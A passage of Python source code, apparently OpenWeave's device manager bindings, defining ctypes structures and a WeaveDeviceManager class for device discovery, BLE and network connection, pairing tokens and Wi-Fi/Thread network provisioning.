print("%sPairing Compatibility Minor Id: %X" % (prefix, self.PairingCompatibilityVersionMinor))
if self.DeviceFeatures != None:
print("%sDevice Features: %s" % (prefix, " ".join([DeviceFeatureToString(val) for val in self.DeviceFeatures])))
@property
def IsRendezvousWiFiESSIDSuffix(self):
return (self.Flags & DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix) != 0
class WirelessRegConfig:
def __init__(self, regDomain=None, opLocation=None, supportedRegDomains=None):
self.RegDomain = regDomain
self.OpLocation = opLocation
self.SupportedRegDomains = supportedRegDomains
def Print(self, prefix=""):
if self.RegDomain != None:
print("%sRegulatory Domain: %s%s" % (prefix, self.RegDomain, ' (world wide)' if self.RegDomain == '00' else ''))
if self.OpLocation != None:
print("%sOperating Location: %s" % (prefix, OperatingLocationToString(self.OpLocation)))
if self.SupportedRegDomains != None:
print("%sSupported Regulatory Domains: %s" % (prefix, ','.join(self.SupportedRegDomains)))
class _IdentifyDeviceCriteriaStruct(Structure):
_fields_ = [
("TargetFabricId", c_uint64),
("TargetModes", c_uint32),
("TargetVendorId", c_uint16),
("TargetProductId", c_uint16),
("TargetDeviceId", c_uint64)
]
class _NetworkInfoStruct(Structure):
_fields_ = [
('NetworkType', c_int32), # The type of network.
('NetworkId', c_int64), # network id assigned to the network by the device, -1 if not specified.
('WiFiSSID', c_char_p), # The WiFi SSID.
('WiFiMode', c_int32), # The operating mode of the WiFi network.
('WiFiRole', c_int32), # The role played by the device on the WiFi network.
('WiFiSecurityType', c_int32), # The WiFi security type.
('WiFiKey', c_void_p), # The WiFi key, or NULL if not specified.
('WiFiKeyLen', c_uint32), # The length in bytes of the WiFi key.
('ThreadNetworkName', c_char_p), # The name of the Thread network.
('ThreadExtendedPANId', c_void_p), # The Thread extended PAN id (8 bytes).
('ThreadNetworkKey', c_void_p), # The Thread master network key.
('ThreadPSKc', c_void_p), # The Thread pre-shared key for commissioner
('ThreadPANId', c_uint32), # The 16-bit Thread PAN ID, or kThreadPANId_NotSpecified
('ThreadChannel', c_uint8), # The current channel on which the Thread network operates, or kThreadChannel_NotSpecified
('WirelessSignalStrength', c_int16),# The signal strength of the network, or INT16_MIN if not available/applicable.
('Hidden', c_bool) # Whether or not the network is hidden.
]
def toNetworkInfo(self):
return NetworkInfo(
networkType = self.NetworkType if self.NetworkType != -1 else None,
networkId = self.NetworkId if self.NetworkId != -1 else None,
wifiSSID = WeaveUtility.CStringToString(self.WiFiSSID),
wifiMode = self.WiFiMode if self.WiFiMode != -1 else None,
wifiRole = self.WiFiRole if self.WiFiRole != -1 else None,
wifiSecurityType = self.WiFiSecurityType if self.WiFiSecurityType != -1 else None,
wifiKey = WeaveUtility.VoidPtrToByteArray(self.WiFiKey, self.WiFiKeyLen),
threadNetworkName = WeaveUtility.CStringToString(self.ThreadNetworkName),
threadExtendedPANId = WeaveUtility.VoidPtrToByteArray(self.ThreadExtendedPANId, 8),
threadNetworkKey = WeaveUtility.VoidPtrToByteArray(self.ThreadNetworkKey, 16),
threadPSKc = WeaveUtility.VoidPtrToByteArray(self.ThreadPSKc, 16),
threadPANId = self.ThreadPANId if self.ThreadPANId != ThreadPANId_NotSpecified else None,
threadChannel = self.ThreadChannel if self.ThreadChannel != ThreadChannel_NotSpecified else None,
wirelessSignalStrength = self.WirelessSignalStrength if self.WirelessSignalStrength != -32768 else None
)
@classmethod
def fromNetworkInfo(cls, networkInfo):
networkInfoStruct = cls()
networkInfoStruct.NetworkType = networkInfo.NetworkType if networkInfo.NetworkType != None else -1
networkInfoStruct.NetworkId = networkInfo.NetworkId if networkInfo.NetworkId != None else -1
networkInfoStruct.WiFiSSID = WeaveUtility.StringToCString(networkInfo.WiFiSSID)
networkInfoStruct.WiFiMode = networkInfo.WiFiMode if networkInfo.WiFiMode != None else -1
networkInfoStruct.WiFiRole = networkInfo.WiFiRole if networkInfo.WiFiRole != None else -1
networkInfoStruct.WiFiSecurityType = networkInfo.WiFiSecurityType if networkInfo.WiFiSecurityType != None else -1
networkInfoStruct.WiFiKey = WeaveUtility.ByteArrayToVoidPtr(networkInfo.WiFiKey)
networkInfoStruct.WiFiKeyLen = len(networkInfo.WiFiKey) if (networkInfo.WiFiKey != None) else 0
networkInfoStruct.ThreadNetworkName = WeaveUtility.StringToCString(networkInfo.ThreadNetworkName)
networkInfoStruct.ThreadExtendedPANId = WeaveUtility.ByteArrayToVoidPtr(networkInfo.ThreadExtendedPANId)
networkInfoStruct.ThreadNetworkKey = WeaveUtility.ByteArrayToVoidPtr(networkInfo.ThreadNetworkKey)
networkInfoStruct.ThreadPSKc = WeaveUtility.ByteArrayToVoidPtr(networkInfo.ThreadPSKc)
networkInfoStruct.ThreadPANId = networkInfo.ThreadPANId if networkInfo.ThreadPANId != None else ThreadPANId_NotSpecified
networkInfoStruct.ThreadChannel = networkInfo.ThreadChannel if networkInfo.ThreadChannel != None else ThreadChannel_NotSpecified
networkInfoStruct.WirelessSignalStrength = networkInfo.WirelessSignalStrength if networkInfo.WirelessSignalStrength != None else -32768
return networkInfoStruct
class _DeviceDescriptorStruct(Structure):
_fields_ = [
('DeviceId', c_uint64), # Weave device id (0 = not present)
('FabricId', c_uint64), # Id of Weave fabric to which the device belongs (0 = not present)
('DeviceFeatures', c_uint32), # Bit field indicating support for specific device features.
('VendorId', c_uint16), # Device vendor id (0 = not present)
('ProductId', c_uint16), # Device product id (0 = not present)
('ProductRevision', c_uint16), # Device product revision (0 = not present)
('ManufacturingYear', c_uint16), # Year of device manufacture (valid range 2001 - 2099, 0 = not present)
('ManufacturingMonth', c_ubyte), # Month of device manufacture (1 = January, 0 = not present)
('ManufacturingDay', c_ubyte), # Day of device manufacture (0 = not present)
('Primary802154MACAddress', c_ubyte * 8), # MAC address for primary 802.15.4 interface (big-endian, all zeros = not present)
('PrimaryWiFiMACAddress', c_ubyte * 6), # MAC address for primary WiFi interface (big-endian, all zeros = not present)
('SerialNumber', c_char * 33), # Serial number of device (nul terminated, 0 length = not present)
('SoftwareVersion', c_char * 33), # Version of software running on the device (nul terminated, 0 length = not present)
('RendezvousWiFiESSID', c_char * 33), # ESSID for pairing WiFi network (nul terminated, 0 length = not present)
('PairingCode', c_char * 17), # Device pairing code (nul terminated, 0 length = not present)
('PairingCompatibilityVersionMajor', c_uint16), # Pairing software compatibility major version
('PairingCompatibilityVersionMinor', c_uint16), # Pairing software compatibility minor version
('Flags', c_ubyte), # Flags
]
def toDeviceDescriptor(self):
return DeviceDescriptor(
deviceId = self.DeviceId if self.DeviceId != 0 else None,
fabricId = self.FabricId if self.FabricId != 0 else None,
vendorId = self.VendorId if self.VendorId != 0 else None,
productId = self.ProductId if self.ProductId != 0 else None,
productRevision = self.ProductRevision if self.ProductRevision != 0 else None,
manufacturingYear = self.ManufacturingYear if self.ManufacturingYear != 0 else None,
manufacturingMonth = self.ManufacturingMonth if self.ManufacturingMonth != 0 else None,
manufacturingDay = self.ManufacturingDay if self.ManufacturingDay != 0 else None,
primary802154MACAddress = bytearray(self.Primary802154MACAddress) if not WeaveUtility.IsByteArrayAllZeros(self.Primary802154MACAddress) else None,
primaryWiFiMACAddress = bytearray(self.PrimaryWiFiMACAddress) if not WeaveUtility.IsByteArrayAllZeros(self.PrimaryWiFiMACAddress) else None,
serialNumber = WeaveUtility.CStringToString(self.SerialNumber) if len(self.SerialNumber) != 0 else None,
softwareVersion = WeaveUtility.CStringToString(self.SoftwareVersion) if len(self.SoftwareVersion) != 0 else None,
rendezvousWiFiESSID = WeaveUtility.CStringToString(self.RendezvousWiFiESSID) if len(self.RendezvousWiFiESSID) != 0 else None,
pairingCode = WeaveUtility.CStringToString(self.PairingCode) if len(self.PairingCode) != 0 else None,
pairingCompatibilityVersionMajor = self.PairingCompatibilityVersionMajor,
pairingCompatibilityVersionMinor = self.PairingCompatibilityVersionMinor,
deviceFeatures = self.DeviceFeatures,
flags = self.Flags)
class _WirelessRegDomain(Structure):
_fields_ = [
('Code', c_char * 2), # Wireless regulatory domain code (exactly 2 characters, non-null terminated)
]
def __str__(self, *args, **kwargs):
return ''.join(WeaveUtility.CStringToString(self.Code))
@classmethod
def fromStr(cls, val):
regDomainStruct = cls()
if val != None:
if len(val) != 2:
raise ValueError('Invalid wireless regulatory domain code: ' + val)
regDomainStruct.Code = WeaveUtility.StringToCString(val)
else:
regDomainStruct.Code = b'\0\0'
return regDomainStruct
class _WirelessRegConfigStruct(Structure):
_fields_ = [
('SupportedRegDomains', POINTER(_WirelessRegDomain)), # Array of _WirelessRegDomain structures
('NumSupportedRegDomains', c_uint16), # Length of SupportedRegDomains array
('RegDomain', _WirelessRegDomain), # Selected wireless regulatory domain
('OpLocation', c_ubyte), # Selected operating location
]
def toWirelessRegConfig(self):
return WirelessRegConfig(
regDomain = str(self.RegDomain) if self.RegDomain.Code[0] != 0 else None,
opLocation = self.OpLocation if self.OpLocation != 0xFF else None,
supportedRegDomains = [ str(self.SupportedRegDomains[i]) for i in range(0, self.NumSupportedRegDomains) ]
)
@classmethod
def fromWirelessRegConfig(cls, regConfig):
regConfigStruct = cls()
regConfigStruct.SupportedRegDomains = POINTER(_WirelessRegDomain)()
regConfigStruct.NumSupportedRegDomains = 0
regConfigStruct.RegDomain = _WirelessRegDomain.fromStr(regConfig.RegDomain)
regConfigStruct.OpLocation = regConfig.OpLocation if regConfig.OpLocation != None else 0
return regConfigStruct
_CompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_IdentifyDeviceCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, POINTER(_DeviceDescriptorStruct))
_PairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_UnpairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_NetworkScanCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_AddNetworkCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint32)
_GetNetworksCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_GetCameraAuthDataCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_char_p, c_char_p)
_GetRendezvousModeCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16)
_GetFabricConfigCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_ErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_ulong, POINTER(DeviceStatusStruct))
_GetBleEventFunct = CFUNCTYPE(c_void_p)
_WriteBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_void_p, c_uint16)
_SubscribeBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_bool)
_CloseBleFunct = CFUNCTYPE(c_bool, c_void_p)
_DeviceEnumerationResponseFunct = CFUNCTYPE(None, c_void_p, POINTER(_DeviceDescriptorStruct), c_char_p)
_GetWirelessRegulatoryConfigCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, POINTER(_WirelessRegConfigStruct))
# This is a fix for WEAV-429. Jay Logue recommends revisiting this at a later
# date to allow for truely multiple instances so this is temporary.
def _singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
@_singleton
class WeaveDeviceManager(object):
def __init__(self, startNetworkThread=True):
self.devMgr = None
self.networkThread = None
self.networkThreadRunable = False
self._weaveStack = WeaveStack()
self._dmLib = None
self._InitLib()
devMgr = c_void_p(None)
res = self._dmLib.nl_Weave_DeviceManager_NewDeviceManager(pointer(devMgr))
if (res != 0):
raise self._weaveStack.ErrorToException(res)
self.devMgr = devMgr
self._weaveStack.devMgr = devMgr
def HandleDeviceEnumerationResponse(devMgr, deviceDescPtr, deviceAddrStr):
print(" Enumerated device IP: %s" % (WeaveUtility.CStringToString(deviceAddrStr)))
deviceDescPtr.contents.toDeviceDescriptor().Print(" ")
self.cbHandleDeviceEnumerationResponse = _DeviceEnumerationResponseFunct(HandleDeviceEnumerationResponse)
self.blockingCB = None # set by other modules(BLE) that require service by thread while thread blocks.
self.cbHandleBleEvent = None # set by other modules (BLE) that provide event callback to Weave.
self.cbHandleBleWriteChar = None
self.cbHandleBleSubscribeChar = None
self.cbHandleBleClose = None
if (startNetworkThread):
self.StartNetworkThread()
def __del__(self):
if (self.devMgr != None):
self._dmLib.nl_Weave_DeviceManager_DeleteDeviceManager(self.devMgr)
self.devMgr = None
self.StopNetworkThread()
def DriveBleIO(self):
# perform asynchronous write to pipe in IO thread's select() to wake for BLE input
res = self._dmLib.nl_Weave_DeviceManager_WakeForBleIO()
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetBleEventCB(self, bleEventCB):
if (self.devMgr != None):
self.cbHandleBleEvent = _GetBleEventFunct(bleEventCB)
self._dmLib.nl_Weave_DeviceManager_SetBleEventCB(self.cbHandleBleEvent)
def SetBleWriteCharCB(self, bleWriteCharCB):
if (self.devMgr != None):
self.cbHandleBleWriteChar = _WriteBleCharacteristicFunct(bleWriteCharCB)
self._dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic(self.cbHandleBleWriteChar)
def SetBleSubscribeCharCB(self, bleSubscribeCharCB):
if (self.devMgr != None):
self.cbHandleBleSubscribeChar = _SubscribeBleCharacteristicFunct(bleSubscribeCharCB)
self._dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic(self.cbHandleBleSubscribeChar)
def SetBleCloseCB(self, bleCloseCB):
if (self.devMgr != None):
self.cbHandleBleClose = _CloseBleFunct(bleCloseCB)
self._dmLib.nl_Weave_DeviceManager_SetBleClose(self.cbHandleBleClose)
def StartNetworkThread(self):
if (self.networkThread != None):
return
def RunNetworkThread():
while (self.networkThreadRunable):
self._weaveStack.networkLock.acquire()
self._dmLib.nl_Weave_DeviceManager_DriveIO(50)
self._weaveStack.networkLock.release()
time.sleep(0.005)
self.networkThread = Thread(target=RunNetworkThread, name="WeaveNetworkThread")
self.networkThread.daemon = True
self.networkThreadRunable = True
self.networkThread.start()
def StopNetworkThread(self):
if (self.networkThread != None):
self.networkThreadRunable = False
self.networkThread.join()
self.networkThread = None
def IsConnected(self):
return self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_IsConnected(self.devMgr)
)
def DeviceId(self):
return self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_DeviceId(self.devMgr)
)
def DeviceAddress(self):
return self._weaveStack.Call(
lambda: WeaveUtility.CStringToString(self._dmLib.nl_Weave_DeviceManager_DeviceAddress(self.devMgr))
)
def SetRendezvousAddress(self, addr, intf = None):
if addr is not None and "\x00" in addr:
raise ValueError("Unexpected NUL character in addr");
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetRendezvousAddress(self.devMgr, WeaveUtility.StringToCString(addr), WeaveUtility.StringToCString(intf))
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetConnectTimeout(self, timeoutMS):
if timeoutMS < 0 or timeoutMS > pow(2,32):
raise ValueError("timeoutMS must be an unsigned 32-bit integer")
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetConnectTimeout(self.devMgr, timeoutMS)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetAutoReconnect(self, autoReconnect):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetAutoReconnect(self.devMgr, autoReconnect)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetRendezvousLinkLocal(self, RendezvousLinkLocal):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_SetRendezvousLinkLocal(self.devMgr, RendezvousLinkLocal)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def StartDeviceEnumeration(self, targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_StartDeviceEnumeration(self.devMgr, deviceCriteria, self.cbHandleDeviceEnumerationResponse, self._weaveStack.cbHandleError)
)
def StopDeviceEnumeration(self):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_StopDeviceEnumeration(self.devMgr)
)
def ConnectDevice(self, deviceId, deviceAddr=None,
pairingCode=None, accessToken=None):
if deviceAddr is not None and '\x00' in deviceAddr:
raise ValueError("Unexpected NUL character in deviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectDevice')
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectDevice_NoAuth(self.devMgr, deviceId, WeaveUtility.StringToCString(deviceAddr), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectDevice_PairingCode(self.devMgr, deviceId, WeaveUtility.StringToCString(deviceAddr), WeaveUtility.StringToCString(pairingCode), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectDevice_AccessToken(self.devMgr, deviceId, WeaveUtility.StringToCString(deviceAddr), WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RendezvousDevice(self, pairingCode=None, accessToken=None,
targetFabricId=TargetFabricId_AnyFabric,
targetModes=TargetDeviceMode_Any,
targetVendorId=TargetVendorId_Any,
targetProductId=TargetProductId_Any,
targetDeviceId=TargetDeviceId_Any):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.RendezvousDevice')
deviceCriteria = _IdentifyDeviceCriteriaStruct()
deviceCriteria.TargetFabricId = targetFabricId
deviceCriteria.TargetModes = targetModes
deviceCriteria.TargetVendorId = targetVendorId
deviceCriteria.TargetProductId = targetProductId
deviceCriteria.TargetDeviceId = targetDeviceId
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_NoAuth(self.devMgr, deviceCriteria, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_PairingCode(self.devMgr, WeaveUtility.StringToCString(pairingCode), deviceCriteria, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RendezvousDevice_AccessToken(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), deviceCriteria, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
# methods for testing BLE performance are not a part of the Weave Device Manager API, but rather are considered internal.
def TestBle(self, connObj, count, duration, delay, ack, size, rx):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TestBle(self.devMgr, connObj, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError, count, duration, delay, ack, size, rx)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def TestResultBle(self, connObj, local):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TestResultBle(self.devMgr, connObj, local)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def TestAbortBle(self, connObj):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TestAbortBle(self.devMgr, connObj)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def TxTimingBle(self, connObj, enabled, remote):
res = self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_TxTimingBle(self.devMgr, connObj, enabled, remote)
)
if (res != 0):
raise self._weaveStack.ErrorToException(res)
# end of BLE testing methods
def ConnectBle(self, bleConnection, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.ConnectBle')
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectBle_NoAuth(self.devMgr, bleConnection, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectBle_PairingCode(self.devMgr, bleConnection, WeaveUtility.StringToCString(pairingCode), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ConnectBle_AccessToken(self.devMgr, bleConnection, WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def PassiveRendezvousDevice(self, pairingCode=None, accessToken=None):
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode != None and accessToken != None):
raise ValueError('Must specify only one of pairingCode or accessToken when calling WeaveDeviceManager.PassiveRendezvousDevice')
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_NoAuth(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_PairingCode(self.devMgr, WeaveUtility.StringToCString(pairingCode), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PassiveRendezvousDevice_AccessToken(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RemotePassiveRendezvous(self, rendezvousDeviceAddr=None, pairingCode=None, accessToken=None, rendezvousTimeout=None, inactivityTimeout=None):
if rendezvousDeviceAddr == None:
rendezvousDeviceAddr = "::"
if '\x00' in rendezvousDeviceAddr:
raise ValueError("Unexpected NUL character in rendezvousDeviceAddr")
if pairingCode is not None and '\x00' in pairingCode:
raise ValueError("Unexpected NUL character in pairingCode")
if (pairingCode == None and accessToken == None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_NoAuth(self.devMgr, WeaveUtility.StringToCString(rendezvousDeviceAddr), rendezvousTimeout, inactivityTimeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
elif (pairingCode != None):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_PASEAuth(self.devMgr, WeaveUtility.StringToCString(rendezvousDeviceAddr), WeaveUtility.StringToCString(pairingCode), rendezvousTimeout, inactivityTimeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
else:
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemotePassiveRendezvous_CASEAuth(self.devMgr, WeaveUtility.StringToCString(rendezvousDeviceAddr), WeaveUtility.ByteArrayToVoidPtr(accessToken), len(accessToken), rendezvousTimeout, inactivityTimeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def ReconnectDevice(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ReconnectDevice(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def Close(self):
self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_Close(self.devMgr)
)
def EnableConnectionMonitor(self, interval, timeout):
if interval < 0 or interval > pow(2,16):
raise ValueError("interval must be an unsigned 16-bit unsigned value")
if timeout < 0 or timeout > pow(2,16):
raise ValueError("timeout must be an unsigned 16-bit unsigned value")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_EnableConnectionMonitor(self.devMgr, interval, timeout, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def DisableConnectionMonitor(self):
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_DisableConnectionMonitor(self.devMgr, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def IdentifyDevice(self):
def HandleIdentifyDeviceComplete(devMgr, reqState, deviceDescPtr):
self._weaveStack.callbackRes = deviceDescPtr.contents.toDeviceDescriptor()
self._weaveStack.completeEvent.set()
cbHandleIdentifyDeviceComplete = _IdentifyDeviceCompleteFunct(HandleIdentifyDeviceComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_IdentifyDevice(self.devMgr, cbHandleIdentifyDeviceComplete, self._weaveStack.cbHandleError)
)
def PairToken(self, pairingToken):
def HandlePairTokenComplete(devMgr, reqState, tokenPairingBundlePtr, tokenPairingBundleLen):
self._weaveStack.callbackRes = WeaveUtility.VoidPtrToByteArray(tokenPairingBundlePtr, tokenPairingBundleLen)
self._weaveStack.completeEvent.set()
cbHandlePairTokenComplete = _PairTokenCompleteFunct(HandlePairTokenComplete)
if pairingToken is not None and isinstance(pairingToken, str):
pairingToken = WeaveUtility.StringToCString(pairingToken)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_PairToken(self.devMgr, WeaveUtility.ByteArrayToVoidPtr(pairingToken), len(pairingToken), cbHandlePairTokenComplete, self._weaveStack.cbHandleError)
)
def UnpairToken(self):
def HandleUnpairTokenComplete(devMgr, reqState):
self._weaveStack.callbackRes = True
self._weaveStack.completeEvent.set()
cbHandleUnpairTokenComplete = _UnpairTokenCompleteFunct(HandleUnpairTokenComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UnpairToken(self.devMgr, cbHandleUnpairTokenComplete, self._weaveStack.cbHandleError)
)
def ScanNetworks(self, networkType):
def HandleScanNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self._weaveStack.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self._weaveStack.completeEvent.set()
cbHandleScanNetworksComplete = _NetworkScanCompleteFunct(HandleScanNetworksComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_ScanNetworks(self.devMgr, networkType, cbHandleScanNetworksComplete, self._weaveStack.cbHandleError)
)
def GetNetworks(self, getFlags):
def HandleGetNetworksComplete(devMgr, reqState, netCount, netInfoPtr):
self._weaveStack.callbackRes = [ netInfoPtr[i].toNetworkInfo() for i in range(netCount) ]
self._weaveStack.completeEvent.set()
cbHandleGetNetworksComplete = _GetNetworksCompleteFunct(HandleGetNetworksComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetNetworks(self.devMgr, getFlags, cbHandleGetNetworksComplete, self._weaveStack.cbHandleError)
)
def GetCameraAuthData(self, nonce):
if nonce is not None and '\x00' in nonce:
raise ValueError("Unexpected NUL character in nonce")
def HandleGetCameraAuthDataComplete(devMgr, reqState, macAddress, signedCameraPayload):
self.callbackRes = [ WeaveUtility.CStringToString(macAddress), WeaveUtility.CStringToString(signedCameraPayload) ]
self.completeEvent.set()
cbHandleGetCameraAuthDataComplete = _GetCameraAuthDataCompleteFunct(HandleGetCameraAuthDataComplete)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_GetCameraAuthData(self.devMgr, WeaveUtility.StringToCString(nonce), cbHandleGetCameraAuthDataComplete, self._weaveStack.cbHandleError)
)
def AddNetwork(self, networkInfo):
def HandleAddNetworkComplete(devMgr, reqState, networkId):
self._weaveStack.callbackRes = networkId
self._weaveStack.completeEvent.set()
cbHandleAddNetworkComplete = _AddNetworkCompleteFunct(HandleAddNetworkComplete)
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
return self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_AddNetwork(self.devMgr, networkInfoStruct, cbHandleAddNetworkComplete, self._weaveStack.cbHandleError)
)
def UpdateNetwork(self, networkInfo):
networkInfoStruct = _NetworkInfoStruct.fromNetworkInfo(networkInfo)
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_UpdateNetwork(self.devMgr, networkInfoStruct, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def RemoveNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
raise ValueError("networkId must be an unsigned 32-bit integer")
self._weaveStack.CallAsync(
lambda: self._dmLib.nl_Weave_DeviceManager_RemoveNetwork(self.devMgr, networkId, self._weaveStack.cbHandleComplete, self._weaveStack.cbHandleError)
)
def EnableNetwork(self, networkId):
if networkId < 0 or networkId > pow(2,32):
